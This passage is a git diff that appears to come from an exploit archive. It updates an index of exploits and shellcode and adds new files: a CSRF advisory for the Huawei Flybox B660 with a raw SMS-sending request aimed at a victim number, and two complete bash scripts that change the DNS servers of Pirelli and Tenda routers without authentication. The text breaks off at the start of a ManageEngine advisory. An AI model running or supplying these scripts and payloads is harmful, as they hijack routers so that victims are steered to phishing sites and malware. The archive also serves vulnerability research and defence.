diff --git a/files.csv b/files.csv
index 0a4c1827b..c66a3ed06 100644
--- a/files.csv
+++ b/files.csv
@@ -909,7 +909,7 @@ id,file,description,date,author,platform,type,port
7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0
7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos,0
7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos,0
-7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0
+7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption",2009-01-13,His0k4,windows,dos,0
7776,platforms/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0
7785,platforms/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",multiple,dos,0
7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0
@@ -5340,7 +5340,7 @@ id,file,description,date,author,platform,type,port
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
-41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use After Free",2017-01-13,"Marcin Ressel",windows,dos,0
+41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6284,7 +6284,7 @@ id,file,description,date,author,platform,type,port
10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0
10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0
10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
-10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
+10321,platforms/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0
@@ -6713,7 +6713,7 @@ id,file,description,date,author,platform,type,port
16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
-16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
+16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
@@ -6725,7 +6725,7 @@ id,file,description,date,author,platform,type,port
16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0
16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
-16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@@ -6758,7 +6758,7 @@ id,file,description,date,author,platform,type,port
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0
-16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
+16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0
16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@@ -8755,6 +8755,7 @@ id,file,description,date,author,platform,type,port
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
+41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9848,7 +9849,7 @@ id,file,description,date,author,platform,type,port
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0
7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
-7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
+7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,windows,remote,0
7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,windows,remote,0
@@ -15219,6 +15220,8 @@ id,file,description,date,author,platform,type,port
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
+41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
+41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15824,6 +15827,7 @@ id,file,description,date,author,platform,type,port
40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -20467,18 +20471,18 @@ id,file,description,date,author,platform,type,port
7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
-7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
-7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol - (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0
+7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Parameter Local File Inclusion",2009-01-11,Osirys,php,webapps,0
+7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection",2009-01-12,H!tm@N,php,webapps,0
7735,platforms/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0
7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0
7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0
7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0
-7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
+7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0
7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0
-7746,platforms/php/webapps/7746.txt,"Joomla! Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
+7746,platforms/php/webapps/7746.txt,"Joomla! Component GigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
-7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
+7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
@@ -20500,7 +20504,7 @@ id,file,description,date,author,platform,type,port
7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
-7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0
+7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion",2009-01-14,Osirys,php,webapps,0
7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0
7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0
@@ -37008,3 +37012,10 @@ id,file,description,date,author,platform,type,port
41068,platforms/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",php,webapps,0
41070,platforms/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
41071,platforms/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
+41074,platforms/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-12,Vulnerability-Lab,hardware,webapps,0
+41075,platforms/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",php,webapps,0
+41077,platforms/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
+41078,platforms/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
+41080,platforms/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps,0
+41081,platforms/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps,0
+41082,platforms/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps,0
diff --git a/platforms/hardware/webapps/41074.txt b/platforms/hardware/webapps/41074.txt
new file mode 100755
index 000000000..b9e00fb5f
--- /dev/null
+++ b/platforms/hardware/webapps/41074.txt
@@ -0,0 +1,206 @@
+Document Title:
+===============
+Huawei Flybox B660 - (POST SMS) CSRF Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2026
+
+
+Release Date:
+=============
+2017-01-12
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2026
+
+
+Common Vulnerability Scoring System:
+====================================
+4.4
+
+
+Product & Service Introduction:
+===============================
+The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
+
+(Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-01-12: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Huawei
+Product: Flybox - Router (Web-Application) B660 3G/4G
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A remote cross-site request forgery vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
+The security vulnerability allows a remote attacker to perform unauthenticated application requests with non-expired browser session
+credentials to unauthorized execute specific backend functions.
+
+The vulnerability is located in the `/htmlcode/html/sms.cgi` and `/htmlcode/html/sms_new.asp` modules and the `RequestFile` parameter
+of the localhost path URL. Remote attackers are able to send sms messages as malicious bomb to other phone numbers from any Huawei
+Flybox B660 via unauthenticated POST method request.
+
+The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
+Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction.
+Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected
+device backend modules.
+
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] /htmlcode/html/sms.cgi
+[+] /htmlcode/html/sms_new.asp
+
+Vulnerable Parameter(s):
+[+] RequestFile
+
+
+Software version of the modem:
+1066.12.15.01.200
+
+Hardware version of the modem:
+WLB3TCLU
+
+Name of the device:
+B660
+
+Hardware version of the router:
+WL1B660I001
+
+Software version of the router:
+1066.11.15.02.110sp01
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+PoC: CSRF Exploit
+
+
+
+
+
+
+
+
+
+--- PoC Session Logs [POST] ---
+/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms_new.asp HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms.asp
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2059
+action=Send&action=Send&sms_text_mode=1&sms_content_1=Malicious Site + IP Adress/Redirection + File:=download&sms_num=1&station=
+,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&phone_numbers=[Victim PhoneNumber]&page=sms_new.asp
+HTTP/1.1 200 OK
+CACHE-CONTROL: no-cache
+Content-Type: text/html
+Content-Length: 364
+
+
+
+
+replace
+
+
+
+
+
+
+Note: Attackers can as well put an auto-submit java-script generated form inside an high traffic website tp exploit.
+
+
+Security Risk:
+==============
+The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
+
+
+
+Credits & Authors:
+==================
+SaifAllah benMassaoud - ( http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )
+
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+ Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+
diff --git a/platforms/hardware/webapps/41077.sh b/platforms/hardware/webapps/41077.sh
new file mode 100755
index 000000000..9aab83b71
--- /dev/null
+++ b/platforms/hardware/webapps/41077.sh
@@ -0,0 +1,83 @@
+#!/bin/bash
+#
+# Pirelli DRG A115 ADSL Router
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# The malicious code doesn't sleeping, he stalking..
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " Pirelli DRG A115 "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/hardware/webapps/41078.sh b/platforms/hardware/webapps/41078.sh
new file mode 100755
index 000000000..a4557c40e
--- /dev/null
+++ b/platforms/hardware/webapps/41078.sh
@@ -0,0 +1,83 @@
+#!/bin/bash
+#
+# Tenda ADSL2/2+ Modem D840R
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# The malicious code doesn't sleeping, he stalking..
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " Tenda ADSL2/2+ Modem D840R "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/java/webapps/41082.txt b/platforms/java/webapps/41082.txt
new file mode 100755
index 000000000..08823e556
--- /dev/null
+++ b/platforms/java/webapps/41082.txt
@@ -0,0 +1,191 @@
+1. ADVISORY INFORMATION
+========================================
